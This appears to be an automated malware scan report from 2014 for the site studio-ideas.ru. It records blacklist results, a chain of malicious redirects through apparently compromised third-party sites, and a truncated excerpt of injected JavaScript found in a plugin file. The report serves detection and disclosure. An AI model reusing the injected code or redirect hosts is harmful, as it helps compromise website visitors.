Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=studio-ideas.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://studio-ideas.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://studio-ideas.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: studio-ideas.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sun, 29 Jun 2014 18:34:07 GMT Location: http://alfsystem.com.my/includes/domit/1.php Server: nginx/1.2.9 Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.3.27 | malicious |
URL: http://alfsystem.com.my/includes/domit/1.php (imitation of visitor from search engine) GET /includes/domit/1.php HTTP/1.1 Host: alfsystem.com.my Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 29 Jun 2014 18:34:07 GMT Location: http://www.csra.de/includes/domit/1.php Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.23 | malicious |
URL: http://www.csra.de/includes/domit/1.php (imitation of visitor from search engine) GET /includes/domit/1.php HTTP/1.1 Host: www.csra.de Referer: http://www.google.com/search?q=redirect+check3 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 29 Jun 2014 18:34:07 GMT Location: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.4.29 | malicious |
URL: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php (imitation of visitor from search engine) GET /components/com_user/views/login/tmpl/1/all3.php HTTP/1.1 Host: jbtconsultinggroup.com Referer: http://www.google.com/search?q=redirect+check4 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 29 Jun 2014 18:34:08 GMT Location: http://google.ru Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html | malicious |
Scanned pages/files
Request | Server response | Status |
http://studio-ideas.ru/ | 200 OK Content-Length: 22687 Content-Type: text/html | clean |
http://studio-ideas.ru/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/x-javascript | clean |
http://studio-ideas.ru/media/widgetkit/js/jquery.js | 200 OK Content-Length: 95228 Content-Type: application/x-javascript | clean |
http://studio-ideas.ru/cache/widgetkit/widgetkit-030a0d94.js | 200 OK Content-Length: 18781 Content-Type: application/x-javascript | clean |
http://studio-ideas.ru/modules/mod_news_pro_gk1/scripts/engine_standard_compressed.js | 200 OK Content-Length: 1667 Content-Type: application/x-javascript | clean |
http://studio-ideas.ru/plugins/system/jcemediabox/js/jcemediabox.js?version=116 | 200 OK Content-Length: 51877 Content-Type: application/x-javascript | clean |
http://studio-ideas.ru/plugins/system/jcemediabox/addons/twitter-src.js?version=116 | 200 OK Content-Length: 1203 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function zzz_check_ua(){ var blackList = ['Linux','Macintosh','FreeBSD','Chrome','iPad','iPhone','IEMobile','Chromium','Android','Firefox/18.0','Firefox/18.0.1','Firefox/18.0.2','Firef document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } if (!zzz_check_ua()) { var cookie = getCookie('v2005ba33'); if (cookie == undefined) { setCookie( Antivirus reports:
| ||
http://studio-ideas.ru/plugins/system/jcemediabox/addons/twitter.js?version=116 | 200 OK Content-Length: 41 Content-Type: application/x-javascript | clean |
http://studio-ideas.ru/plugins/system/yoo_effects/yoo_effects.js.php?lb=1&re=1&sl=1 | 200 OK Content-Length: 32395 Content-Type: application/x-javascript | clean |
http://studio-ideas.ru/templates/Studio-ideas/js/smoothsc.js | 200 OK Content-Length: 1858 Content-Type: application/x-javascript | clean |
http://studio-ideas.ru/templates/Studio-ideas/js/cufon-yui.js | 200 OK Content-Length: 18258 Content-Type: application/x-javascript | clean |
http://studio-ideas.ru/templates/Studio-ideas/js/cufon-replace.js | 200 OK Content-Length: 608 Content-Type: application/x-javascript | clean |
http://studio-ideas.ru//plugins/system/u24/lytebox/3.22/lytebox.js/ | 404 Not Found Content-Length: 328 Content-Type: text/html | clean |
http://studio-ideas.ru/test404page.js | 404 Not Found Content-Length: 299 Content-Type: text/html | clean |